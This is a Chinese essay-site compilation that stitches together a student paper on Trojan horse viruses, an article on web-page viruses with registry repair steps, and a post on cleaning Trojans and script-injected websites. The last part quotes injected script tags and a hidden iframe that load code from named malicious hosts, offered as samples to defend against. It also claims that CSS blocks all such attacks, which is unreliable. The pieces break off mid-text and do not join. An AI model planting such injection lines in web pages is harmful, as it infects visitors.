篇一:木马病毒的原理和预防论文
信息安全课程
期末论文
题 目 计算机木马病毒的研究和
预防措施
学 院 专 业 软件工程
年 级 2011级
学生学号 12011242706
学生姓名
计算机木马病毒的研究和预防措施
摘 要
随着信息化时代的到来人类社会生活对因特网的需求日益增长,使得计算机
网络技术迅速发展和普及。因特网使得全世界都联系到了一起。极大的促进了全
球一体化的发展。但是随着互联网的普及和应用的不断发展,各种黑客工具和网
络手段导致网络和用户收到财产损失,其中最严重的就是木马攻击手段。它以其
攻击范围广、危害大等特点成为常见的网络攻击技术之一,对整个互联网照成了
极大的危害。本文分析了木马病毒的基本原理,针对木马病毒的特征、传播途径
等分析结果,找出计算机感染病毒的原因。并且对木马病毒的种类、加载技术及
现状进行了详细的研究,提出了完善的防范建议。
关键词:木马病毒;网络安全;自动加载;文件劫持;防护;措施
Abstract
With the growing demand for information technology era of human social life on
the Internet, computer network technology rapid development and popularization. The
Internet makes the whole world is linked to together. Greatly contributed to the
development of global integration. But with the popularity of the Internet and the
continuous development of the application, a variety of hacking tools and network
means the network and the user receives property damage, the most serious of which
is Trojan attacks. With its wide range of attacks, hazards and other characteristics to
become one of the common network attack techniques, the entire Internet according to become great harm.
Keywords: Trojan; network security; Automatically loaded ;File
hijacked ;protective;measures
目录
引言................................................................................................................................................. 1
1 木马病毒的概述......................................................................................................................... 1
1.1木马病毒的基本特征........................................................................................................... 1
1.2木马病毒的传播途径........................................................................................................... 2
1.3木马病毒病毒的危害........................................................................................................... 2
2 木马病毒的现状......................................................................................................................... 3
2.1特洛伊木马的发展............................................................................................................... 4
2.2 木马病毒的种类.................................................................................................................. 4
3 木马病毒的基本原理................................................................................................................. 5
3.1木马病毒的加载技术........................................................................................................... 8
3.1.1 系统启动自动加载....................................................................................................... 8
3.1.2 文件劫持....................................................................................................................... 8
3.2 木马病毒的隐藏技术.......................................................................................................... 8
4 “熊猫烧香”病毒剖析............................................................................................................. 9
5 木马病毒的防范....................................................................................................................... 14
5.1基于用户的防范措施......................................................................................................... 15
5.2基于服务器端的防范措施................................................................................................. 17
5.3加强计算机网络管理......................................................................................................... 18
总结 .............................................................................................................................................. 19
参考文献 ...................................................................................................................................... 19
引言
本文简单的介绍木马病毒的制作原理和防护措施,让大家对木马病毒的基本了解。所谓知己知彼方能百战百胜,我们要是学会了木马病毒的制作原理和目的,这样对我们来说计算机病毒就不是那么深奥了,难以琢磨了。我们把计算机木马病毒的特性,生理周期,传播情况,主要危害,和他的分类弄清楚了,我们才能对症下药.
虽然计算机病毒正随着科技的进步而飞快的发展,但是我们只要把他的工作原理弄清楚了,再加以对计算机病毒的不断认识,我们就不必要为止恐慌了,下面就有请看主题:
1 木马病毒的概述及概述
1.1木马的的定义
木马的全称是“特洛伊木马”,是一种新型的计算机网络病毒程序,是一种基于远程控制的黑客工具,它利用自身具有的植入功能,或依附具有传播功能的病毒,进驻目标机器监听、修改。窃取文件。
1.2木马的基本特征
1、隐蔽性是其首要的特征
当用户执行正常程序时,在难以察觉的情况下,完成危害影虎的操作,具有隐蔽性。它的隐蔽性主要体现在6个方面:1.不产生图标、2.文件隐藏、3.在专用文件夹中隐藏、4.自动在任务管理其中隐形、5.无声无息的启动、6.伪装成驱动程序及动态链接库
2、它具有自动运行性
它是一个当你系统启动时即自动运行的程序,所以它必需潜入在你的启动配置文件中,如win.ini、system.ini、winstart.bat以及启动组等文件之中。
3、木马程序具有欺骗性
木马程序要达到其长期隐蔽的目的,就必需借助系统中已有的文件,以防被你发现,它经常使用的是常见的文件名或扩展名,如“dll\win\sys\explorer等字样,或者仿制一些不易被人区别的文件名,如字母“l”与数字“1”、字母“o”与数字“0”,常修改基本文件中的这些难以分辨的字符,更有甚者干脆就
借用系统文件中已有的文件名,只不过它保存在不同路径之中。还有的木马程序为了隐藏自己,也常把自己设置成一个ZIP文件式图标,当你一不小心打开它时,它就马上运行。等等这些手段那些编制木马程序的人还在不断地研究、发掘,总之是越来越隐蔽,越来越专业,所以有人称木马程序为“骗子程序”。
4、具备自动恢复功能
现在很多的木马程序中的功能模块已不再是由单一的文件组成,而是具有多重备份,可以相互恢复。
5、能自动打开端口
应服务器客户端的通信手段,利用TCP/IP协议不常用端口自动进行连接,开方便之“门”
6、功能的特殊性
通常的木马的功能都是十分特殊的,除了普通的文件操作以外,还有些木马具有搜索cache中的口令、设置口令、扫描目标机器人的IP地址、进行键盘记录、远程注册表的操作、以及锁定鼠标等功能,上面所讲的远程控制软件的功能当然不会有的,毕竟远程控制软件是用来控制远程机器,方便自己操作而已,而不是用来黑对方的机器的。
1.3木马的传播途径
1.利用操作系统和浏览器漏洞传播。
2.利用移动存储设备(U盘)等来传播。
3.利用第三方软件(如realplayer,迅雷,暴风影音等)漏洞传播
4.利用ARP欺骗方式来传播
5利用电子邮件,QQ,MSN等通讯软件传播
6.利用网页挂马,嵌入恶意代码来传播
1.4木马病毒的危害
1.利用通讯软件盗取用户个人信息。
黑客可以利用木马病毒盗取用户的如QQ,MSN等账号进行盗取用户好友个人信息等。
2.盗取网游账号,威胁我们的虚拟财产安全
黑客利用木马病毒盗取用户游戏账户密码,并将用户游戏中的装备或游戏币转移,照成损失。
3.盗取用户的网银信息,威胁我们的真是财产安全
篇二:网页病毒介绍
网页病毒 网页病毒是利用网页来进行破坏的病毒,它使用一些SCRIPT语言编写的一些恶意代码利用浏览器的漏洞来实现病毒植入。当用户登录某些含有网页病毒的网站时,网页病毒便被悄悄激活,这些病毒一旦激活,可以利用系统的一些资源进行破坏。轻则修改用户的注册表,使用户的首页、浏览器标题改变,重则可以关闭系统的很多功能,装上木马,染上病毒,使用户无法正常使用计算机系统,严重者则可以将用户的系统进行格式化。而这种网页病毒容易编写和修改,使用户防不胜防。
1.概述
2.性质特点
3.攻击方式
4.种类
5.防范
6.扩散方式
7.几种病毒的详细介绍
8.参考文献
1.概述
网页病毒都是利用JS.ActiveX、WSH共同合作来实现对客户端计算机,进行本地的写操作,如改写注册表,在本地计算机硬盘上添加、删除、更改文件夹或文件等操作。而这一功能却恰恰使网页病毒、网页木马有了可乘之机。
2.性质特点
网页病毒使得各种非法恶意程序能够得以被自动执行,在于它完全不受用户的控制。你一旦浏览含有病毒的网页,即可以在你不知不觉的情况下马上中招,给用户的系统带来一般性的、轻度性的、严重恶性等不同程度的破坏。令你苦不堪言,甚至损失惨重无法弥补。
3.攻击方式
既然是网页病毒,那么很简单的说,它就是一个网页,但在这个网页运行与本地时,它所执行的操作就不仅仅是下载后再读出,伴随着前者的操作背后,还有这病毒原体软件的下载,或是木马的下载,然后执行,悄悄地修改你的注册表,等等?那么,这类网页都有什么特征呢?
(1)美丽的网页名称,以及利用浏览者的无知
(2)利用浏览者的好奇心
(3)无意识的浏览者
它主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的Java Applet小应用程序,javascript脚本语言程序,ActiveX软件部件网络交互技术支持可自动执行的代码程序,以强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取用户文件,或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。
4.种类 根据目前互联网上流行的常见网页病毒的作用对象及表现特征,归纳为以下两大种类:
一、通过Java Script、Applet、ActiveX编辑的脚本程序修改IE浏览器:
1.默认主页被修改;
2.默认首页被修改;
3.默认的微软主页被修改;
4.主页设置被屏蔽锁定,且设置选项无效不可改回;
5.默认的IE搜索引擎被修改;
6 IE标题栏被添加非法信息
7.OE标题栏被添加非法信息;
8.鼠标右键菜单被添加非法网站广告链接;
9.鼠标右键弹出菜单功能被禁用失常;
10 IE收藏夹被强行添加非法网站的地址链接;
11.在IE工具栏非法添加按钮;
12.锁定地址下拉菜单及其添加文字信息;
13 IE菜单“查看”下的“源文件”被禁用;
二、通过Java Script、Applet、ActiveX编辑的脚本程序修改用户操作系统:
1.开机出现对话框;
2.系统正常启动后,但IE被锁定网址自动调用打开;
3.格式化硬盘
4.暗藏“万花谷”蛤蟆病毒,全方位侵害封杀系统,最后导致瘫痪崩溃;
5.非法读取或盗取用户文件;
6.锁定禁用注册表;
7.注册表被锁定禁用之后,编辑*.reg注册表文件打开方式错乱;
8.时间前面加广告;
9.启动后首页被再次修改;
10.更改“我的电脑”下的一系列文件夹名称
5防范 1.提高自身意识,不随便浏览别人给的奇怪网址
2.安装杀毒软件,安全助手等
3.保持浏览器版本更新
4.及时安装补丁
6.扩散方式
开机型病毒(boot sector viruses) 开机型病毒会依附在磁片上。当你开机或重新开机时,就会自行复制到你硬碟中的开机磁段。(开机磁段是指当你开机时,电脑会迳行读取的一组指令。)你只会从受到感染的磁片上,碰到开机型病毒;从共享档案或是执行软体上,是不会感染到开机型病毒的。由於今日的大多数电脑,都不用开机片开机,所以这些病毒已经蛮少见了,但是它们仍可随著存有其他种类档案的磁片,到处感染。
程式病毒(program viruses) ,就是我们所熟知的传统档案型病毒,这些恶魔会依附在与其他程式相关的执行档上。由於这种病毒大多藏於EXE或COM档案中,当电脑启动程式(包括SYS、DLL、BIN以及其他)时,它们就可能感染电脑所执行的任何档案。你要是启动根据病毒扩散的方式,可以将多数病毒归类成下面三种:
某个含有病毒的程式,病毒通常就会进驻你电脑中的记忆体。从那时开始,病毒就会感染所有执行的程式。从技术上来看,巨集病毒可说是程式病毒的变种。
巨集病毒(macro viruses) 这些病毒会影响个人电脑中,用来建立文件或工作表的范本(通常是normal.dot档案)。一旦某个范本受到感染,以该程式开启的每个文件或工作表,也会受到破坏。由於感染的目标是一般的办公室应用程式,加上又可在平台之间扩散,所以巨集病毒最近已变得相当普遍。 这里要提醒你留意的重点是:病毒只会在你执行它们时才会发作,不论是执行它们所聚集的程式,或是从受到感染的磁片开机。这一点看起来是如此清楚易懂,但是大多数的恶作剧病毒,却还是吓坏了那些不了解这个基本观念的人们。
7.详细介绍
1)默认主页、首页被恶意更改
最通常的办法是找到相应的注册表文件,把它改回来。
以IE首页的注册表文件修改为例,我们首先要启动Windows的注册表编辑器,具体方法是点击Windows界面左下角的“开始”按钮,再选择“运行”,在弹出的对话框中输入“regedit”就可以进入注册表编辑器了。
IE首页的注册表文件是放在HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start Page下的,而这个子键的键值就是IE首页的网址。以笔者的电脑为例,键值是http://,它是可以修改的,用户可以改为自己常用的网址,或是改为“about:blank”,即空白页。这样,你重启IE就可以看到效果了。
如果这种方法也不能奏效,那就是因为一些病毒或是流氓软件在你的电脑里面安装了一个自运行程序,就算你通过修改注册表恢复了IE首页,但是你一重新启动电脑,这个程序就会自动运行再次篡改。
这时候,我们需要对注册表文件进行更多的修改,运行“regedit”,然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页就好了。
除了上面的情况外,有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。对于这种情况,我们同样可以通过修改注册表来解决,运行“regedit”展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
Explorer\Main\Default_Page_URL子键,然后将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。
如果注册表无法进入,下面的方法有用!
解锁注册表
将下面的代码拷入一个文本文档,存为一个.reg文件。然后双击导入,便可为注册解锁。 Windows Registry Editor Version 5.00 [Hkey_current_user\Software\microsoft\windows \currentversion\Policies\system] "DisableRegistryTools"=dword:00000000
如果觉得麻烦,建议用这个软件修复!
用瑞星卡卡助手修复IE
http:///softs/9536.html
这个软件与别的助手相比特点就是小而实用,也不捆绑其它软件,不用了卸载容易,可以修复IE到初始状态。
我们可以在IE属性里改我们的IE默认主页,当然也可以在注册表里面更改.在IE属性里怎么改我就不用说了,我只说一下怎么在注册表里改.
1、IE默认连接首页被修改,受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page 通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的。
解决办法: 运行“regedit.exe”打开注册表,展开注册表到:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main 在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可; 然后,同样的方法展开注册表到:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。 退出注册表编辑器,重新启动计算机,一切OK了!
特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
解决办法:
运行注册表编辑器regedit.exe,然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:Program Files\registry.exe,最后从IE选项中重新设置起始页就好了。
2、篡改IE的默认页
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改:
篇三:最简单的系统木马病毒解决方法
最简单的系统木马病毒解决方法
系统中木马病毒后该怎么办?下面我们介绍一些简单的解决方法。
1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。注意在system32目录下的Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。 由于windows 任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\Program Files、C:\Documents and Settings\user\Local Settings\Temporary Internet Files、C:\Documents and Settings\user\Local Settings\Temp等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。
2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。根据我的经验,有三种办法供尝试:
A.可能是某些木马病毒、流氓软件等注册为系统服务了。办法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。再试著中止病毒进程并删除。
B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。
C.使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试著删除病毒进程文件和相应的模块。(慎用)
3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。编辑〉查找,查找目标为病毒进程名,在搜索结果中将与之有关的键值删除。有时这样做不能遏止病毒,还应尝试使用步骤2中方法。
4.某些病毒会劫持IE浏览器,导致乱弹网页的状况。建议用360安全卫士,看浏览器辅助对象BHO是否有可疑项目,有没有没恶意插件或者木马。有就修复它。
5.其他提示:为了更好的操作,请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中,这样做可以帮你更快找到病毒文件。 开始>>运行,输入msconfig,确定,可以打开“系统配置实用程序”。选择“启动”,察看开机时加载的程序,如果在其中发现病毒程序,可以禁止它在开机时加载。不过此法治标不治本,甚至对某些程序来说无效。还是要按步骤1、2办。
2009-03-06 17:01
网站被挂木马解决方法
参考网站:/viewthread.php?tid=428347
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:
注意,以下地址含有木马,请不要轻易访问:
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了: document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
...
var Kfqq, Qqs="[color=Magenta]784378237[/color]";
qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>
对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。 来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈: 解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。 解决方案3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}
原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。
解决方案4:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。
解决方案5:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}
第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如
lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)www.ght.cc电影王国
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/images/logo.gif' />"); 我的测试环境是:
Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。
综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。
以后也要再仔细研究一下,看看我的代码有什么BUG,有的话一定要解决问题!
6.说了这么多,不过有时还是不能解决。只好请教高人或格式化重做系统了,当然不推荐后者。
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有